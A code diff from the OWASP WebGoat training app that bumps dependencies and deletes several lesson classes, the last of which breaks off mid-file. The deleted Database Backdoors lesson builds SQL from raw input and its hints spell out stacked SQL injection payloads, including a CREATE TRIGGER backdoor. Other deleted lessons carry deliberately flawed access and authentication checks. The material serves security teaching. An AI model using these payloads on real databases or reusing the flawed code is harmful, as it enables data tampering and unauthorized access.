-                            <li><a href="#">WS SQL Injection</a></li>
-                        </ul>
-                    </li>
-                    <li class="sub-menu">
-                        <a href="javascript:void(0);"><span>New Lesson</span><i class="arrow fa fa-angle-right pull-right"></i></a>
-                        <ul>
-                            <li><a href="#">How to Add New Lesson</a></li>
-                        </ul>
-                    </li>
-                </ul>
-            </div>
-
-        </aside>
-        <!--sidebar left end-->
-        <!--main content start-->
-        <section class="main-content-wrapper">
-            <section id="main-content">
-            	<div class="row">
-            		<div class="col-md-8">
-            			<div class="col-md-12" align="left">
-            				<div class="panel">
-            					<div class="panel-body">
-            						<button type="button" class="btn btn-primary">Java [Source]</button>
-            						<button type="button" class="btn btn-primary">Solution</button>
-            					</div>
-            				</div>
-            			</div>
-            			<div class="col-md-12">
-               				<div class="panel">
-                            	<div class="panel-body">
-               						<h1>About WebGoat</h1>
-               						<hr />
-               						<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque volutpat feugiat nunc, non vulputate urna dictum ut. Nam consectetur porttitor diam ut ultricies. Aenean dolor dolor, congue sed ornare non, elementum in mauris. Phasellus orci sem, rhoncus eu laoreet eu, aliquam nec ante. Suspendisse sit amet justo eget eros tempor tincidunt vel quis justo. Sed pulvinar enim id neque pellentesque, eu rhoncus lorem eleifend. Morbi congue tortor sit amet pulvinar posuere.</p>
-              						<p>Integer rhoncus gravida arcu, at bibendum magna feugiat sit amet. Vivamus id lacinia massa. Praesent eu quam ullamcorper, tempor elit nec, lobortis massa. In in eros eu augue rhoncus semper. Vestibulum ornare purus vitae bibendum vulputate. Cras eleifend commodo lectus, eget pharetra justo mollis quis. Donec tempor magna lectus, vitae suscipit turpis venenatis et. Nulla facilisi.</p>
-              						<p>Nam placerat magna in massa euismod fringilla. Pellentesque in cursus risus, eu hendrerit ligula. Quisque ultrices eget tortor ut eleifend. Praesent auctor libero nec quam fringilla faucibus. Curabitur cursus risus eu faucibus rutrum. Morbi dapibus nulla risus, et euismod eros posuere volutpat. Quisque ut diam diam. Quisque sed enim tortor. Suspendisse commodo magna nec felis ultricies laoreet. Donec sit amet vehicula eros. Phasellus at dapibus enim. Sed massa quam, aliquet eu mattis at, porttitor a nisi.</p>
-              						<hr />
-              						<p>Nam placerat magna in massa euismod fringilla. Pellentesque in cursus risus, eu hendrerit ligula. Quisque ultrices eget tortor ut eleifend. Praesent auctor libero nec quam fringilla faucibus. Curabitur cursus risus eu faucibus rutrum. Morbi dapibus nulla risus, et euismod eros posuere volutpat. Quisque ut diam diam. Quisque sed enim tortor. Suspendisse commodo magna nec felis ultricies laoreet. Donec sit amet vehicula eros. Phasellus at dapibus enim. Sed massa quam, aliquet eu mattis at, porttitor a nisi.</p>
-               					</div>
-               				</div>
-               			</div>
-               		</div><!--col-md-8 end-->
-            		<div class="col-md-4">
-            			<div class="col-md-12">
-            			<div class="panel">
-            				<div class="panel-body">
-            					<div align="left">
-            						<button type="button" class="btn btn-default btn-sm">Params</button>
-            						<button type="button" class="btn btn-default btn-sm">Hints</button>
-            						<button type="button" class="btn btn-default btn-sm">Cookies</button>
-            					</div>
-            					<hr />
-            					<h3>Hints</h3>
-            					<p>Nam placerat magna in massa euismod fringilla. Pellentesque in cursus risus, eu hendrerit ligula. Quisque ultrices eget tortor ut eleifend. Praesent auctor libero nec quam fringilla faucibus. Curabitur cursus risus eu faucibus rutrum. Morbi dapibus nulla risus, et euismod eros posuere volutpat. Quisque ut diam diam. Quisque sed enim tortor. Suspendisse commodo magna nec felis ultricies laoreet. Donec sit amet vehicula eros. Phasellus at dapibus enim. Sed massa quam, aliquet eu mattis at, porttitor a nisi.</p>
-            				</div>
-            			</div>
-            			</div>
-            		</div><!--col-md-4 end-->              		
-				</div>
-            </section>
-        </section>
-        <!--main content end-->
-        
-  	<!-- Basic Modal -->
-    <div class="modal fade" id="aboutModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
-        <div class="modal-dialog">
-            <div class="modal-content">
-                <div class="modal-header">
-                    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
-                    <h3 class="modal-title" id="myModalLabel">About WebGoat</h3>
-                </div>
-                <div class="modal-body modal-scroll">
-                    <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aenean quis posuere sapien, at ornare neque. Curabitur commodo efficitur ante, at finibus ex faucibus ut. Vivamus id diam blandit, convallis justo sed, vehicula sem. Cras a semper ex. Etiam dignissim tempus metus, sit amet blandit arcu pulvinar ac. Mauris dignissim rutrum ante sit amet posuere. Proin mollis sapien augue, at tempor metus iaculis eu. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Cras elementum finibus tincidunt.</p>
-                    <p>Version</p>
-                    <p>OWASP Reference - probably text and image</p>
-                    <div class="row">
-                    	<div class="col-md-6">
-                  		  <p>WebGoat Authors
-                    			<ul>
-                    				<li>name...</li>
-                    				<li>name...</li>
-                    				<li>name...</li>
-                    			</ul>
-                  		  	</p>
-                    	</div>
-                    	<div class="col-md-6">
-							<p>WebGoat Design Team
-								<ul>
-									<li>name...</li>
-									<li>name...</li>
-									<li>name...</li>
-								</ul>
-							</p>
-						</div>
-					</div>
-					<div class="row">
-                    	<div class="col-md-6">
-							<p>Active Contributors
-								<ul>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-								</ul>
-							</p>
-						</div>
-						<div class="col-md-6">
-							<p>Past Contributors
-								<ul>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-									<li>name... (Role)</li>
-								</ul>
-							</p>
-						</div>
-					</div>
-                </div>
-                <div class="modal-footer">
-                    <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
-                </div>
-            </div>
-        </div>
-    </div>
-    <!-- End Basic Modal -->
-        
-    </section>
-    <!--Global JS-->
-    <script src="assets/js/jquery-1.10.2.min.js"></script>
-    <script src="assets/plugins/bootstrap/js/bootstrap.min.js"></script>
-    <script src="assets/plugins/waypoints/waypoints.min.js"></script>
-    <script src="assets/js/application.js"></script>
-
-</body>
-
-</html>

pom.xml

@@ -3,7 +3,7 @@
     <name>WebGoat</name>
     <modelVersion>4.0.0</modelVersion>
     <groupId>WebGoat</groupId>
-    <artifactId>WebGoat</artifactId>
+    <artifactId>WebGoat-Container</artifactId>
     <packaging>war</packaging>
     <version>6.0.1</version>
 
@@ -130,7 +130,7 @@
         <dependency>
             <groupId>commons-digester</groupId>
             <artifactId>commons-digester</artifactId>
-            <version>1.4.1</version>
+            <version>1.8.1</version>
             <exclusions>
                 <exclusion>
                     <groupId>xml-apis</groupId>
@@ -166,7 +166,7 @@
         <dependency>
             <groupId>hsqldb</groupId>
             <artifactId>hsqldb</artifactId>
-            <version>1.8.0.7</version>
+            <version>1.8.0.10</version>
         </dependency>
         <dependency>
             <groupId>log4j</groupId>

src/main/java/org/owasp/webgoat/Catcher.java

@@ -108,7 +108,8 @@ public class Catcher extends HammerHead
 			lesson.getLessonTracker(session).store(session, lesson);
 
 			// BDM MC
-			if ( request.getParameter("Deleter") != null ){org.owasp.webgoat.lessons.BlindScript.StaticDeleter();}
+// WEB-173 - removed for testing, as plugin architecture would not allow this
+//			if ( request.getParameter("Deleter") != null ){org.owasp.webgoat.lessons.BlindScript.StaticDeleter();}
 
 		} catch (Throwable t)
 		{

src/main/java/org/owasp/webgoat/lessons/AccessControlMatrix.java

@@ -1,276 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created October 28, 2003
- */
-
-public class AccessControlMatrix extends LessonAdapter
-{
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    private final static String RESOURCE = "Resource";
-
-    private final static String USER = "User";
-
-    private final static String[] resources = { "Public Share", "Time Card Entry", "Performance Review",
-            "Time Card Approval", "Site Manager", "Account Manager" };
-
-    private final static String[] roles = { "Public", "User", "Manager", "Admin" };
-
-    private final static String[] users = { "Moe", "Larry", "Curly", "Shemp" };
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            String user = s.getParser().getRawParameter(USER, users[0]);
-            String resource = s.getParser().getRawParameter(RESOURCE, resources[0]);
-            String credentials = getRoles(user).toString();
-
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            TR tr = new TR();
-            tr.addElement(new TD().addElement("Change user:"));
-            tr.addElement(new TD().addElement(ECSFactory.makePulldown(USER, users, user, 1)));
-            t.addElement(tr);
-
-            // These two lines would allow the user to select the resource from a list
-            // Didn't seem right to me so I made them type it in.
-            // ec.addElement( new P().addElement( "Choose a resource:" ) );
-            // ec.addElement( ECSFactory.makePulldown( RESOURCE, resources, resource, 1 ) );
-            tr = new TR();
-            tr.addElement(new TD().addElement("Select resource: "));
-            tr.addElement(new TD().addElement(ECSFactory.makePulldown(RESOURCE, resources, resource, 1)));
-            t.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD("&nbsp;").setColSpan(2).setAlign("center"));
-            t.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD(ECSFactory.makeButton("Check Access")).setColSpan(2).setAlign("center"));
-            t.addElement(tr);
-            ec.addElement(t);
-
-            if (isAllowed(user, resource))
-            {
-                if (!getRoles(user).contains("Admin") && resource.equals("Account Manager"))
-                {
-                    makeSuccess(s);
-                }
-                s.setMessage("User " + user + " " + credentials + " was allowed to access resource " + resource);
-            }
-            else
-            {
-                s.setMessage("User " + user + " " + credentials + " did not have privilege to access resource "
-                        + resource);
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the RoleBasedAccessControl object
-     * 
-     * @return The category value
-     */
-
-    protected Category getDefaultCategory()
-    {
-        return Category.ACCESS_CONTROL;
-    }
-
-    /**
-     * Gets the hints attribute of the RoleBasedAccessControl object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Many sites attempt to restrict access to resources by role.");
-        hints.add("Developers frequently make mistakes implementing this scheme.");
-        hints.add("Attempt combinations of users, roles, and resources.");
-        return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the resources attribute of the RoleBasedAccessControl object
-     * 
-     * @param rl
-     *            Description of the Parameter
-     * @return The resources value
-     */
-    private List getResources(List rl)
-    {
-        // return the resources allowed for these roles
-        ArrayList<String> list = new ArrayList<String>();
-
-        if (rl.contains(roles[0]))
-        {
-            list.add(resources[0]);
-        }
-
-        if (rl.contains(roles[1]))
-        {
-            list.add(resources[1]);
-            list.add(resources[5]);
-        }
-
-        if (rl.contains(roles[2]))
-        {
-            list.add(resources[2]);
-            list.add(resources[3]);
-        }
-
-        if (rl.contains(roles[3]))
-        {
-            list.add(resources[4]);
-            list.add(resources[5]);
-        }
-
-        return list;
-    }
-
-    /**
-     * Gets the role attribute of the RoleBasedAccessControl object
-     * 
-     * @param user
-     *            Description of the Parameter
-     * @return The role value
-     */
-
-    private List getRoles(String user)
-    {
-        ArrayList<String> list = new ArrayList<String>();
-
-        if (user.equals(users[0]))
-        {
-            list.add(roles[0]);
-        }
-        else if (user.equals(users[1]))
-        {
-            list.add(roles[1]);
-            list.add(roles[2]);
-        }
-        else if (user.equals(users[2]))
-        {
-            list.add(roles[0]);
-            list.add(roles[2]);
-        }
-        else if (user.equals(users[3]))
-        {
-            list.add(roles[3]);
-        }
-
-        return list;
-    }
-
-    /**
-     * Gets the title attribute of the AccessControlScreen object
-     * 
-     * @return The title value
-     */
-
-    public String getTitle()
-    {
-        return ("Using an Access Control Matrix");
-    }
-
-    // private final static ArrayList userList = new ArrayList(Arrays.asList(users));
-    // private final static ArrayList resourceList = new ArrayList(Arrays.asList(resources));
-    // private final static ArrayList roleList = new ArrayList(Arrays.asList(roles));
-
-    /**
-     * Please do not ever implement an access control scheme this way! But it's not the worst I've
-     * seen.
-     * 
-     * @param user
-     *            Description of the Parameter
-     * @param resource
-     *            Description of the Parameter
-     * @return The allowed value
-     */
-
-    private boolean isAllowed(String user, String resource)
-    {
-        List roles = getRoles(user);
-        List resources = getResources(roles);
-        return (resources.contains(resource));
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/BackDoors.java

@@ -1,293 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.PRE;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Sherif Koussa <a href="http://www.softwaresecured.com">Software Secured</a>
- */
-public class BackDoors extends SequentialLessonAdapter
-{
-
-    private final static Integer DEFAULT_RANKING = new Integer(80);
-
-    private final static String USERNAME = "username";
-
-    private final static String SELECT_ST = "select userid, password, ssn, salary, email from employee where userid=";
-
-    public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    protected Element doStage1(WebSession s) throws Exception
-    {
-        return concept1(s);
-    }
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-        return concept2(s);
-    }
-
-    private void addDBEntriesToEC(ElementContainer ec, ResultSet rs)
-    {
-        try
-        {
-            if (rs.next())
-            {
-                Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(1);
-                TR tr = new TR();
-                tr.addElement(new TH("User ID"));
-                tr.addElement(new TH("Password"));
-                tr.addElement(new TH("SSN"));
-                tr.addElement(new TH("Salary"));
-                tr.addElement(new TH("E-Mail"));
-                t.addElement(tr);
-
-                tr = new TR();
-                tr.addElement(new TD(rs.getString("userid")));
-                tr.addElement(new TD(rs.getString("password")));
-                tr.addElement(new TD(rs.getString("ssn")));
-                tr.addElement(new TD(rs.getString("salary")));
-                tr.addElement(new TD(rs.getString("email")));
-                t.addElement(tr);
-                while (rs.next())
-                {
-                    tr = new TR();
-                    tr.addElement(new TD(rs.getString("userid")));
-                    tr.addElement(new TD(rs.getString("password")));
-                    tr.addElement(new TD(rs.getString("ssn")));
-                    tr.addElement(new TD(rs.getString("salary")));
-                    tr.addElement(new TD(rs.getString("email")));
-                    t.addElement(tr);
-                }
-                ec.addElement(t);
-            }
-        } catch (SQLException e)
-        {
-            // TODO Auto-generated catch block
-            e.printStackTrace();
-        }
-    }
-
-    protected Element concept1(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(makeUsername(s));
-
-        try
-        {
-            String userInput = s.getParser().getRawParameter(USERNAME, "");
-            if (!userInput.equals(""))
-            {
-                userInput = SELECT_ST + userInput;
-                String[] arrSQL = userInput.split(";");
-                Connection conn = DatabaseUtilities.getConnection(s);
-                Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                            ResultSet.CONCUR_READ_ONLY);
-                if (arrSQL.length == 2)
-                {
-                    statement.executeUpdate(arrSQL[1]);
-
-                    getLessonTracker(s).setStage(2);
-                    s
-                            .setMessage("You have succeeded in exploiting the vulnerable query and created another SQL statement. Now move to stage 2 to learn how to create a backdoor or a DB worm");
-                }
-
-                ResultSet rs = statement.executeQuery(arrSQL[0]);
-                addDBEntriesToEC(ec, rs);
-
-            }
-        } catch (Exception ex)
-        {
-            ec.addElement(new PRE(ex.getMessage()));
-        }
-        return ec;
-    }
-
-    protected Element concept2(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(makeUsername(s));
-
-        String userInput = s.getParser().getRawParameter(USERNAME, "");
-
-        if (!userInput.equals(""))
-        {
-            userInput = SELECT_ST + userInput;
-            String[] arrSQL = userInput.split(";");
-            Connection conn = DatabaseUtilities.getConnection(s);
-            Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-
-            if (arrSQL.length == 2)
-            {
-                if (userInput.toUpperCase().indexOf("CREATE TRIGGER") != -1)
-                {
-                    makeSuccess(s);
-                }
-            }
-            ResultSet rs = statement.executeQuery(arrSQL[0]);
-            addDBEntriesToEC(ec, rs);
-
-        }
-        return ec;
-    }
-
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        if (!getLessonTracker(s).getCompleted())
-        {
-            switch (getStage(s))
-            {
-                case 1:
-                    instructions = "Stage " + getStage(s)
-                            + ": Use String SQL Injection to execute more than one SQL Statement. ";
-                    instructions = instructions
-                            + " The first stage of this lesson is to teach you how to use a vulnerable field to create two SQL ";
-                    instructions = instructions
-                            + " statements. The first is the system's while the second is totally yours.";
-                    instructions = instructions
-                            + " Your account ID is 101. This page allows you to see your password, ssn and salary.";
-                    instructions = instructions + "  Try to inject another update to update salary to something higher";
-                    break;
-                case 2:
-                    instructions = "Stage " + getStage(s) + ": Use String SQL Injection to inject a backdoor. ";
-                    instructions = instructions
-                            + " The second stage of this lesson is to teach you how to use a vulneable fields to inject the DB work or the backdoor.";
-                    instructions = instructions
-                            + " Now try to use the same technique to inject a trigger that would act as ";
-                    instructions = instructions + " SQL backdoor, the syntax of a trigger is: <br>";
-                    instructions = instructions
-                            + " CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid<br>";
-                    instructions = instructions
-                            + " Note that nothing will actually be executed because the current underlying DB doesn't support triggers.";
-                    break;
-            }
-        }
-
-        return instructions;
-    }
-
-    protected Element makeUsername(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        StringBuffer script = new StringBuffer();
-        script.append("<STYLE TYPE=\"text/css\"> ");
-        script.append(".blocklabel { margin-top: 8pt; }");
-        script.append(".myClass     { color:red;");
-        script.append(" font-weight: bold;");
-        script.append("padding-left: 1px;");
-        script.append("padding-right: 1px;");
-        script.append("background: #DDDDDD;");
-        script.append("border: thin black solid; }");
-        script.append("LI   { margin-top: 10pt; }");
-        script.append("</STYLE>");
-        ec.addElement(new StringElement(script.toString()));
-
-        ec.addElement(new StringElement("User ID: "));
-        Input username = new Input(Input.TEXT, "username", "");
-        ec.addElement(username);
-
-        String userInput = s.getParser().getRawParameter("username", "");
-
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-
-        String formattedInput = "<span class='myClass'>" + userInput + "</span>";
-        ec.addElement(new Div(SELECT_ST + formattedInput));
-
-        Input b = new Input();
-
-        b.setName("Submit");
-        b.setType(Input.SUBMIT);
-        b.setValue("Submit");
-
-        ec.addElement(new PRE(b));
-
-        return ec;
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Sherif Koussa&nbsp;", MAC_LOGO);
-    }
-
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Your user id is 101. Use it to see your information");
-        hints.add("A semi-colon usually ends a SQL statement and starts a new one.");
-        hints.add("Try this 101 or 1=1; update employee set salary=100000");
-        hints.add("For stage 2, Try 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON "
-                + "employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid");
-        return hints;
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.INJECTION;
-    }
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    public String getTitle()
-    {
-        return ("Database Backdoors ");
-    }
-}

src/main/java/org/owasp/webgoat/lessons/BasicAuthentication.java

@@ -1,283 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class BasicAuthentication extends SequentialLessonAdapter
-{
-    private static final String EMPTY_STRING = "";
-
-    private static final String WEBGOAT_BASIC = "webgoat_basic";
-
-    private static final String AUTHORIZATION = "Authorization";
-
-    private static final String ORIGINAL_AUTH = "Original_Auth";
-
-    private static final String ORIGINAL_USER = "Original.user";
-
-    private static final String BASIC = "basic";
-
-    private static final String JSESSIONID = "JSESSIONID";
-
-    private final static String HEADER_NAME = "header";
-
-    private final static String HEADER_VALUE = "value";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    protected Element doStage1(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        String headerName = null;
-        String headerValue = null;
-        try
-        {
-            headerName = new String(s.getParser().getStringParameter(HEADER_NAME, EMPTY_STRING));
-            headerValue = new String(s.getParser().getStringParameter(HEADER_VALUE, EMPTY_STRING));
-
-            // <START_OMIT_SOURCE>
-            // FIXME: This won;t work for CBT, we need to use the UserTracker
-            // Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
-            if (headerName.equalsIgnoreCase(AUTHORIZATION)
-                    && (headerValue.equals("guest:guest") || headerValue.equals("webgoat:webgoat")))
-            {
-                getLessonTracker(s).setStage(2);
-                return doStage2(s);
-            }
-            else
-            {
-                if (headerName.length() > 0 && !headerName.equalsIgnoreCase(AUTHORIZATION))
-                {
-                    s.setMessage(getLabelManager().get("BasicAuthHeaderNameIncorrect"));
-                }
-                if (headerValue.length() > 0
-                        && !(headerValue.equals("guest:guest") || headerValue.equals("webgoat:webgoat")))
-                {
-                    s.setMessage(getLabelManager().get("BasicAuthHeaderValueIncorrect"));
-
-                }
-            }
-            // <END_OMIT_SOURCE>
-
-            Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            TR row1 = new TR();
-            TR row2 = new TR();
-            row1.addElement(new TD(new StringElement(getLabelManager().get("BasicAuthenticationWhatIsNameOfHeader"))));
-            row2.addElement(new TD(new StringElement(getLabelManager().get("BasicAuthenticationWhatIsDecodedValueOfHeader"))));
-
-            row1.addElement(new TD(new Input(Input.TEXT, HEADER_NAME, headerName.toString())));
-            row2.addElement(new TD(new Input(Input.TEXT, HEADER_VALUE, headerValue.toString())));
-
-            t.addElement(row1);
-            t.addElement(row2);
-
-            ec.addElement(t);
-            ec.addElement(new P());
-
-            Element b = ECSFactory.makeButton(getLabelManager().get("Submit"));
-            ec.addElement(b);
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            if (s.getRequest().isUserInRole(WEBGOAT_BASIC))
-            {
-                String originalUser = getLessonTracker(s).getLessonProperties()
-                        .getProperty(ORIGINAL_USER, EMPTY_STRING);
-                getLessonTracker(s, originalUser).setCompleted(true);
-                getLessonTracker(s, originalUser).setStage(1);
-                getLessonTracker(s, originalUser).store(s, this);
-                makeSuccess(s);
-                s.setMessage(getLabelManager().get("BasicAuthenticiationGreenStars1")+ originalUser + getLabelManager().get("BasicAuthenticationGreenStars2"));
-                return ec;
-            }
-            else
-            {
-                // If we are still in the ORIGINAL_USER role see if the Basic Auth header has been
-                // manipulated
-                String originalAuth = getLessonTracker(s).getLessonProperties()
-                        .getProperty(ORIGINAL_AUTH, EMPTY_STRING);
-                String originalSessionId = getLessonTracker(s).getLessonProperties()
-                        .getProperty(JSESSIONID, s.getCookie(JSESSIONID));
-
-                // store the original user info in the BASIC properties files
-                if (originalSessionId.equals(s.getCookie(JSESSIONID)))
-                {
-                    // Store the original user name in the "basic" user properties file. We need to
-                    // use
-                    // the original user to access the correct properties file to update status.
-                    // store the initial auth header
-                    getLessonTracker(s).getLessonProperties().setProperty(JSESSIONID, originalSessionId);
-                    getLessonTracker(s).getLessonProperties().setProperty(ORIGINAL_AUTH, s.getHeader(AUTHORIZATION));
-                    getLessonTracker(s, BASIC).getLessonProperties().setProperty(ORIGINAL_USER, s.getUserName());
-                    getLessonTracker(s, BASIC).setStage(2);
-                    getLessonTracker(s, BASIC).store(s, this, BASIC);
-                }
-
